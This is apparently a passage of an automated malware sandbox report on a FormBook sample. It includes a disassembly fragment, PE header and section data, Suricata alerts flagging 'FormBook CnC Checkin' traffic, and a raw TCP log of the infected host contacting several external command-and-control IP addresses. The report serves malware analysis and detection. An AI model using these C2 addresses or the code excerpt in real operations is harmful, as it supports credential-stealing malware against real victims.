                                                                      add esp, 0Ch
                                                                      sub ecx, ecx
                                                                      xor edi, edi
                                                                      sub esi, esi
                                                                      mov dword ptr [ebp-14h], 00000054h
                                                                      mov dword ptr [ebp-10h], 00003B15h
                                                                      mov dword ptr [ebp-0Ch], 00001B0Dh
                                                                      mov dword ptr [ebp-08h], 00004BD2h
                                                                      mov edi, edi
                                                                      inc ecx
                                                                      mov eax, ecx
                                                                      and eax, 80000007h
                                                                      jns 00007F67A8535547h
                                                                      dec eax
                                                                      or eax, FFFFFFF8h
                                                                      inc eax
                                                                      jne 00007F67A8535544h
                                                                      add ecx, ecx
                                                                      cmp ecx, 00000CB4h
                                                                      jl 00007F67A8535527h
                                                                      mov ecx, 00006ACDh
                                                                      mov eax, 92492493h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 05h
                                                                      push edx
                                                                      pop ecx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F67A853552Dh
                                                                      mov eax, 00001819h
                                                                      push esi
                                                                      pop esi
                                                                      push 0000001Bh
                                                                      pop edx
                                                                      mov ecx, 000000C2h
                                                                      cmp ecx, edx
                                                                      cmovl ecx, edx
                                                                      dec eax
                                                                      jne 00007F67A853553Ah
                                                                      mov ecx, 00001F5Ah
                                                                      mov eax, 82082083h
                                                                      imul ecx
                                                                      add edx, ecx
                                                                      sar edx, 06h
                                                                      mov ecx, edx
                                                                      shr ecx, 1Fh
                                                                      add ecx, edx
                                                                      jne 00007F67A853552Dh
                                                                      call 00007F67A853739Ah
                                                                      mov dword ptr [ebp-5Ch], eax
                                                                      mov edi, edi
                                                                      inc edi
                                                                      mov eax, 55555556h
                                                                      imul edi

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [C++] VS2012 build 50727
                                                                      • [ASM] VS2012 build 50727
                                                                      • [LNK] VS2012 build 50727

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000xadae.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x456940x458004b830bd6515e4b638ffbe7153f9b56f5False0.9886711724370504data7.995289145928988IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x470000xadae0xae006540f80ae10b177d8854d082363de5b2False0.5349766522988506data3.786852869035346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x471a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.34898843930635837
                                                                      RT_ICON0x4770c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.7125451263537906
                                                                      RT_ICON0x47fb40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 26880.6284648187633263
                                                                      RT_ICON0x48e5c0x1628Device independent bitmap graphic, 64 x 128 x 8, image size 46080.5784555712270804
                                                                      RT_ICON0x4a4840x2ca8Device independent bitmap graphic, 96 x 192 x 8, image size 103680.5443491952414276
                                                                      RT_ICON0x4d12c0x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 184320.5187217890849405
                                                                      RT_GROUP_ICON0x51d540x5adata0.7555555555555555

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-13T15:11:05.274132+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849757154.39.239.23780TCP
                                                                      2025-01-13T15:11:05.274132+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849757154.39.239.23780TCP
                                                                      2025-01-13T15:12:05.118293+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84970747.83.1.9080TCP
                                                                      2025-01-13T15:12:05.118293+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84970747.83.1.9080TCP
                                                                      2025-01-13T15:12:20.715447+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84970984.32.84.3280TCP
                                                                      2025-01-13T15:12:23.239953+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971084.32.84.3280TCP
                                                                      2025-01-13T15:12:25.783859+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971184.32.84.3280TCP
                                                                      2025-01-13T15:12:28.332119+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84971384.32.84.3280TCP
                                                                      2025-01-13T15:12:28.332119+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84971384.32.84.3280TCP
                                                                      2025-01-13T15:12:34.038776+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849714104.21.18.17180TCP
                                                                      2025-01-13T15:12:36.592127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715104.21.18.17180TCP
                                                                      2025-01-13T15:12:39.118648+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849716104.21.18.17180TCP
                                                                      2025-01-13T15:12:41.679730+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849717104.21.18.17180TCP
                                                                      2025-01-13T15:12:41.679730+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849717104.21.18.17180TCP
                                                                      2025-01-13T15:12:48.675328+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849718134.122.135.4880TCP
                                                                      2025-01-13T15:12:51.250228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849719134.122.135.4880TCP
                                                                      2025-01-13T15:12:53.779143+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849720134.122.135.4880TCP
                                                                      2025-01-13T15:12:56.296137+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849721134.122.135.4880TCP
                                                                      2025-01-13T15:12:56.296137+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849721134.122.135.4880TCP
                                                                      2025-01-13T15:13:02.050209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849722199.192.21.16980TCP
                                                                      2025-01-13T15:13:04.656922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849723199.192.21.16980TCP
                                                                      2025-01-13T15:13:07.261861+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849724199.192.21.16980TCP
                                                                      2025-01-13T15:13:09.725455+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849725199.192.21.16980TCP
                                                                      2025-01-13T15:13:09.725455+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849725199.192.21.16980TCP
                                                                      2025-01-13T15:13:15.727465+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849726154.197.162.23980TCP
                                                                      2025-01-13T15:13:18.241415+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727154.197.162.23980TCP
                                                                      2025-01-13T15:13:20.807234+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849728154.197.162.23980TCP
                                                                      2025-01-13T15:13:23.337048+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849729154.197.162.23980TCP
                                                                      2025-01-13T15:13:23.337048+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849729154.197.162.23980TCP
                                                                      2025-01-13T15:13:28.960302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973084.32.84.3280TCP
                                                                      2025-01-13T15:13:31.543843+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973184.32.84.3280TCP
                                                                      2025-01-13T15:13:34.062236+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973284.32.84.3280TCP
                                                                      2025-01-13T15:13:36.621759+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84973384.32.84.3280TCP
                                                                      2025-01-13T15:13:36.621759+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84973384.32.84.3280TCP
                                                                      2025-01-13T15:13:43.445036+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849734134.122.135.4880TCP
                                                                      2025-01-13T15:13:46.013616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735134.122.135.4880TCP
                                                                      2025-01-13T15:13:48.567336+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849736134.122.135.4880TCP
                                                                      2025-01-13T15:13:51.067776+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849737134.122.135.4880TCP
                                                                      2025-01-13T15:13:51.067776+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849737134.122.135.4880TCP
                                                                      2025-01-13T15:13:57.643124+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973847.83.1.9080TCP
                                                                      2025-01-13T15:14:00.279215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84973947.83.1.9080TCP
                                                                      2025-01-13T15:14:02.901606+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974047.83.1.9080TCP
                                                                      2025-01-13T15:14:05.590151+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974147.83.1.9080TCP
                                                                      2025-01-13T15:14:05.590151+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84974147.83.1.9080TCP
                                                                      2025-01-13T15:14:11.180458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849742188.114.96.380TCP
                                                                      2025-01-13T15:14:13.790127+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849743188.114.96.380TCP
                                                                      2025-01-13T15:14:16.279625+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849744188.114.96.380TCP
                                                                      2025-01-13T15:14:18.811617+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849745188.114.96.380TCP
                                                                      2025-01-13T15:14:18.811617+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849745188.114.96.380TCP
                                                                      2025-01-13T15:14:32.502742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849746199.59.243.22880TCP
                                                                      2025-01-13T15:14:35.068885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849747199.59.243.22880TCP
                                                                      2025-01-13T15:14:37.604204+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849748199.59.243.22880TCP
                                                                      2025-01-13T15:14:40.163362+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849749199.59.243.22880TCP
                                                                      2025-01-13T15:14:40.163362+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849749199.59.243.22880TCP
                                                                      2025-01-13T15:14:46.757752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975013.228.81.3980TCP
                                                                      2025-01-13T15:14:49.304835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975113.228.81.3980TCP
                                                                      2025-01-13T15:14:51.335771+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975213.228.81.3980TCP
                                                                      2025-01-13T15:14:53.914854+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975313.228.81.3980TCP
                                                                      2025-01-13T15:14:53.914854+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84975313.228.81.3980TCP
                                                                      2025-01-13T15:15:02.353998+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849754154.39.239.23780TCP
                                                                      2025-01-13T15:15:04.898313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849755154.39.239.23780TCP
                                                                      2025-01-13T15:15:07.445198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849756154.39.239.23780TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2025 15:12:03.488137007 CET4970780192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:12:03.493124008 CET804970747.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:12:03.493266106 CET4970780192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:12:03.506777048 CET4970780192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:12:03.511621952 CET804970747.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:12:05.117938995 CET804970747.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:12:05.118088961 CET804970747.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:12:05.118293047 CET4970780192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:12:05.122026920 CET4970780192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:12:05.128873110 CET804970747.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:12:20.230520964 CET4970980192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:20.235388994 CET804970984.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:20.235515118 CET4970980192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:20.256707907 CET4970980192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:20.261535883 CET804970984.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:20.715213060 CET804970984.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:20.715446949 CET4970980192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:21.758486986 CET4970980192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:21.763345957 CET804970984.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:22.777439117 CET4971080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:22.782327890 CET804971084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:22.782411098 CET4971080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:22.798211098 CET4971080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:22.803610086 CET804971084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:23.239749908 CET804971084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:23.239953041 CET4971080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:24.305372000 CET4971080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:24.314459085 CET804971084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:25.324275970 CET4971180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:25.329421997 CET804971184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:25.329519033 CET4971180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:25.341511965 CET4971180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:25.347225904 CET804971184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:25.348579884 CET804971184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:25.783726931 CET804971184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:25.783859015 CET4971180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:26.852271080 CET4971180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:26.857511044 CET804971184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:27.870747089 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:27.875632048 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:27.875720024 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:27.884059906 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:27.889092922 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.331995010 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332014084 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332024097 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332036018 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332047939 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332058907 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332068920 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332078934 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332089901 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332101107 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:28.332118988 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:28.332264900 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:28.336236000 CET4971380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:12:28.340991974 CET804971384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:12:33.358500957 CET4971480192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:33.364577055 CET8049714104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:33.367326975 CET4971480192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:33.381563902 CET4971480192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:33.387377024 CET8049714104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:34.037123919 CET8049714104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:34.038672924 CET8049714104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:34.038775921 CET4971480192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:34.884289980 CET4971480192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:35.903014898 CET4971580192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:35.907902956 CET8049715104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:35.907982111 CET4971580192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:35.926218033 CET4971580192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:35.931051970 CET8049715104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:36.591033936 CET8049715104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:36.592058897 CET8049715104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:36.592127085 CET4971580192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:37.430421114 CET4971580192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:38.448601961 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:38.453610897 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:38.453737974 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:38.466509104 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:38.471380949 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:38.471587896 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:39.118366003 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:39.118475914 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:39.118489981 CET8049716104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:39.118648052 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:39.118648052 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:39.977191925 CET4971680192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:40.995775938 CET4971780192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:41.000704050 CET8049717104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:41.000827074 CET4971780192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:41.008698940 CET4971780192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:41.013562918 CET8049717104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:41.678679943 CET8049717104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:41.679553032 CET8049717104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:41.679729939 CET4971780192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:41.681715965 CET4971780192.168.2.8104.21.18.171
                                                                      Jan 13, 2025 15:12:41.688478947 CET8049717104.21.18.171192.168.2.8
                                                                      Jan 13, 2025 15:12:47.745964050 CET4971880192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:47.751028061 CET8049718134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:47.751296043 CET4971880192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:47.765522003 CET4971880192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:47.770406961 CET8049718134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:48.675133944 CET8049718134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:48.675188065 CET8049718134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:48.675328016 CET4971880192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:49.274116993 CET4971880192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:50.291971922 CET4971980192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:50.297107935 CET8049719134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:50.297239065 CET4971980192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:50.308125973 CET4971980192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:50.313051939 CET8049719134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:51.250098944 CET8049719134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:51.250133038 CET8049719134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:51.250227928 CET4971980192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:51.820883036 CET4971980192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:52.841553926 CET4972080192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:52.846515894 CET8049720134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:52.846590042 CET4972080192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:52.861541033 CET4972080192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:52.866400003 CET8049720134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:52.866620064 CET8049720134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:53.778836012 CET8049720134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:53.778876066 CET8049720134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:53.779143095 CET4972080192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:54.367877007 CET4972080192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:55.386173964 CET4972180192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:55.391346931 CET8049721134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:55.391473055 CET4972180192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:55.399000883 CET4972180192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:55.403911114 CET8049721134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:56.295811892 CET8049721134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:56.295830011 CET8049721134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:12:56.296137094 CET4972180192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:56.298346043 CET4972180192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:12:56.303383112 CET8049721134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:01.414300919 CET4972280192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:01.419555902 CET8049722199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:01.419656992 CET4972280192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:01.500821114 CET4972280192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:01.506117105 CET8049722199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:02.050100088 CET8049722199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:02.050143003 CET8049722199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:02.050209045 CET4972280192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:03.008668900 CET4972280192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:04.027497053 CET4972380192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:04.032461882 CET8049723199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:04.035497904 CET4972380192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:04.051412106 CET4972380192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:04.056278944 CET8049723199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:04.656794071 CET8049723199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:04.656852961 CET8049723199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:04.656922102 CET4972380192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:05.557876110 CET4972380192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:06.576788902 CET4972480192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:06.581653118 CET8049724199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:06.581754923 CET4972480192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:06.604235888 CET4972480192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:06.609179020 CET8049724199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:06.609302998 CET8049724199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:07.261768103 CET8049724199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:07.261806011 CET8049724199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:07.261861086 CET4972480192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:08.118402004 CET4972480192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.137309074 CET4972580192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.142290115 CET8049725199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:09.142369032 CET4972580192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.152055979 CET4972580192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.156864882 CET8049725199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:09.724921942 CET8049725199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:09.724956036 CET8049725199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:09.725455046 CET4972580192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.731359005 CET4972580192.168.2.8199.192.21.169
                                                                      Jan 13, 2025 15:13:09.736192942 CET8049725199.192.21.169192.168.2.8
                                                                      Jan 13, 2025 15:13:15.104285955 CET4972680192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:15.109261036 CET8049726154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:15.109349966 CET4972680192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:15.123614073 CET4972680192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:15.128357887 CET8049726154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:15.725334883 CET8049726154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:15.725452900 CET8049726154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:15.727464914 CET4972680192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:16.633256912 CET4972680192.168.2.8154.197.162.239
